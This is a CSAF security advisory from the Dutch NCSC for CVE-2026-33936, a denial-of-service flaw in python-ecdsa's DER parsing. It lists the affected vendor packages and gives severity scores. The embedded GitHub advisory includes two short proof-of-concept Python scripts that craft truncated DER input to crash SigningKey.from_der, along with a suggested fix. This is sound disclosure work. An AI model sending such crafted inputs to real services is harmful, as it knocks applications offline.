{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33936",
        "tracking": {
            "current_release_date": "2026-04-01T14:48:23.719840Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33936",
            "initial_release_date": "2026-03-28T07:40:28.998486Z",
            "revision_history": [
                {
                    "date": "2026-03-28T07:40:28.998486Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:40:39.792928Z",
                    "number": "2",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:40:43.361407Z",
                    "number": "3",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-28T07:41:32.115859Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:41:33.677923Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:43:08.118706Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T12:44:26.823302Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)."
                },
                {
                    "date": "2026-03-28T12:44:32.475392Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T00:38:32.512770Z",
                    "number": "9",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-29T12:19:57.703976Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| CWES updated (1)."
                },
                {
                    "date": "2026-03-30T12:32:46.315170Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (3).| Product Identifiers created (3).| Products created (3).| References created (5).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-30T12:32:50.047537Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-30T20:47:10.918934Z",
                    "number": "13",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-31T06:19:51.354831Z",
                    "number": "14",
                    "summary": "Products created (1).| Product Identifiers created (1)."
                },
                {
                    "date": "2026-04-01T07:10:52.681744Z",
                    "number": "15",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)."
                },
                {
                    "date": "2026-04-01T07:10:57.868956Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T13:25:03.645743Z",
                    "number": "17",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-04-01T13:25:07.071246Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T14:39:35.415663Z",
                    "number": "19",
                    "summary": "Unknown change."
                }
            ],
            "status": "interim",
            "version": "19"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.19.2",
                                "product": {
                                    "name": "vers:unknown/<0.19.2",
                                    "product_id": "CSAFPID-5973147",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:tlsfuzzer:ecdsa:*:*:*:*:*:python:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "ECDSA"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.19.2",
                                "product": {
                                    "name": "vers:unknown/<0.19.2",
                                    "product_id": "CSAFPID-5956305"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "python-ecdsa"
                    }
                ],
                "category": "vendor",
                "name": "Tlsfuzzer"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/6",
                                "product": {
                                    "name": "vers:rpm/6",
                                    "product_id": "CSAFPID-1439313",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:satellite:6"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Satellite 6"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-1771989",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:rhui:4::el8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Update Infrastructure 4 for Cloud Providers"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5963658"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-ecdsa"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5963659"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-ecdsa"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Satellite 6"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5963660"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-ecdsa"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Update Infrastructure 4 for Cloud Providers"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:microsoft/*",
                                        "product": {
                                            "name": "vers:microsoft/*",
                                            "product_id": "CSAFPID-5967085",
                                            "product_identification_helper": {
                                                "cpe": "cpe:2.3:a:microsoft:azl3_python-ecdsa_0.18.0-2:*:*:*:*:*:*:*:*"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "azl3 python-ecdsa 0.18.0-2 on Azure Linux 3.0"
                            }
                        ],
                        "category": "product_family",
                        "name": "Open Source Software"
                    }
                ],
                "category": "vendor",
                "name": "Microsoft"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.19.2",
                                "product": {
                                    "name": "vers:unknown/<0.19.2",
                                    "product_id": "CSAFPID-5970822"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "ecdsa"
                    }
                ],
                "category": "vendor",
                "name": "unknown"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1404993"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-ecdsa"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1404994"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-ecdsa"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33936",
            "cwe": {
                "id": "CWE-130",
                "name": "Improper Handling of Length Parameter Inconsistency"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33936.json"
                },
                {
                    "category": "description",
                    "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33936"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nAn issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.\n\n1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.\n\n2. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.\n\n## Impact\n\nPotential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.\n\n## Reproduction\n\nAttach and run the following PoCs:\n\n###  poc_truncated_der_octet.py\n\n```python\nfrom ecdsa.der import remove_octet_string, UnexpectedDER\n\n# OCTET STRING (0x04)\n# Declared length: 0x82 0x10 0x00  -> 4096 bytes\n# Actual body: only 3 bytes -> truncated DER\nbad = b\"\\x04\\x82\\x10\\x00\" + b\"ABC\"\n\ntry:\n    body, rest = remove_octet_string(bad)\n    print(\"[BUG] remove_octet_string accepted truncated DER.\")\n    print(\"Declared length=4096, actual body_len=\", len(body), \"rest_len=\", len(rest))\n    print(\"Body=\", body)\n    print(\"Rest=\", rest)\nexcept UnexpectedDER as e:\n    print(\"[OK] Rejected malformed DER:\", e)\n```\n\n- Expected: reject malformed DER when declared length exceeds available bytes\n- Actual: accepts the truncated DER and returns a shorter body\n- Example output:\n```\nParsed body_len= 3 rest_len= 0 (while declared length is 4096)\n```\n\n### poc_signingkey_from_der_indexerror.py\n\n```python\nfrom ecdsa import SigningKey, NIST256p\nimport ecdsa\n\nprint(\"ecdsa version:\", ecdsa.__version__)\n\nsk = SigningKey.generate(curve=NIST256p)\ngood = sk.to_der()\nprint(\"Good DER len:\", len(good))\n\n\ndef find_crashing_mutation(data: bytes):\n    b = bytearray(data)\n\n    # Try every OCTET STRING tag position and corrupt a short-form length byte\n    for i in range(len(b) - 4):\n        if b[i] != 0x04:  # OCTET STRING tag\n            continue\n\n        L = b[i + 1]\n        if L >= 0x80:\n            # skip long-form lengths for simplicity\n            continue\n\n        max_possible = len(b) - (i + 2)\n        if max_possible <= 10:\n            continue\n\n        # Claim more bytes than exist -> truncation\n        newL = min(0x7F, max_possible + 20)\n        b2 = bytearray(b)\n        b2[i + 1] = newL\n\n        try:\n            SigningKey.from_der(bytes(b2))\n        except Exception as e:\n            return i, type(e).__name__, str(e)\n\n    return None\n\n\nres = find_crashing_mutation(good)\nif res is None:\n    print(\"[INFO] No exception triggered by this mutation strategy.\")\nelse:\n    i, etype, msg = res\n    print(\"[BUG] SigningKey.from_der raised unexpected exception type.\")\n    print(\"Offset:\", i, \"Exception:\", etype, \"Message:\", msg)\n```\n\n- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`\n- Actual: deterministically triggers an internal `IndexError` (DoS risk)\n- Example output:\n```\nResult: (5, 'IndexError', 'index out of bounds on dimension 1')\n```\n\n## Suggested fix\n\nAdd “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:\n\n- `remove_octet_string()`\n- `remove_constructed()`\n- `remove_implicit()`\n\nAdditionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.\n\n## Credit\n\nMohamed Abdelaal (@0xmrma)",
                    "title": "github - https://api.github.com/advisories/GHSA-9f5j-8jwj-x28g"
                },
                {
                    "category": "description",
                    "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33936"
                },
                {
                    "category": "description",
                    "text": "python-ecdsa: Denial of Service via improper DER length validation in crafted private keys",
                    "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "description",
                    "text": "The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Prior to version 0.19.2, an issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service. Version 0.19.2 patches the issue.\nA flaw was found in the `ecdsa` Python package, which is used for cryptographic operations. A remote attacker can exploit this vulnerability by sending a specially crafted data input, known as Distinguished Encoding Rules (DER). This malformed input can cause applications that process untrusted cryptographic keys to crash, leading to a denial of service.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33936.json"
                },
                {
                    "category": "description",
                    "text": "Affected versions of the python-ecdsa package are vulnerable to Denial of Service due to improper validation of DER length fields in malformed private keys. The ecdsa.der.remove_octet_string() function accepts truncated DER input when the declared length exceeds the available buffer, and this malformed data can then reach SigningKey.from_der(), which may raise an internal IndexError instead of safely rejecting the input with UnexpectedDER or ValueError.",
                    "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json"
                },
                {
                    "category": "other",
                    "text": "0.00047",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.4",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is cwe data available from source Microsoft",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "Is related to a product by vendor Unknown, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 2\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5956305",
                    "CSAFPID-1404993",
                    "CSAFPID-1404994",
                    "CSAFPID-1439313",
                    "CSAFPID-1508257",
                    "CSAFPID-1771989",
                    "CSAFPID-5963658",
                    "CSAFPID-5963659",
                    "CSAFPID-5963660",
                    "CSAFPID-5967085",
                    "CSAFPID-5970822",
                    "CSAFPID-5973147"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33936.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33936"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-9f5j-8jwj-x28g"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-33936"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - microsoft",
                    "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33936.json"
                },
                {
                    "category": "external",
                    "summary": "Source - pyupio",
                    "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-9f5j-8jwj-x28g"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33936"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33936"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
                        "baseScore": 5.3,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-1404993",
                        "CSAFPID-1404994",
                        "CSAFPID-1439313",
                        "CSAFPID-1508257",
                        "CSAFPID-1771989",
                        "CSAFPID-5956305",
                        "CSAFPID-5963658",
                        "CSAFPID-5963659",
                        "CSAFPID-5963660",
                        "CSAFPID-5967085",
                        "CSAFPID-5970822",
                        "CSAFPID-5973147"
                    ]
                }
            ],
            "title": "CVE-2026-33936"
        }
    ]
}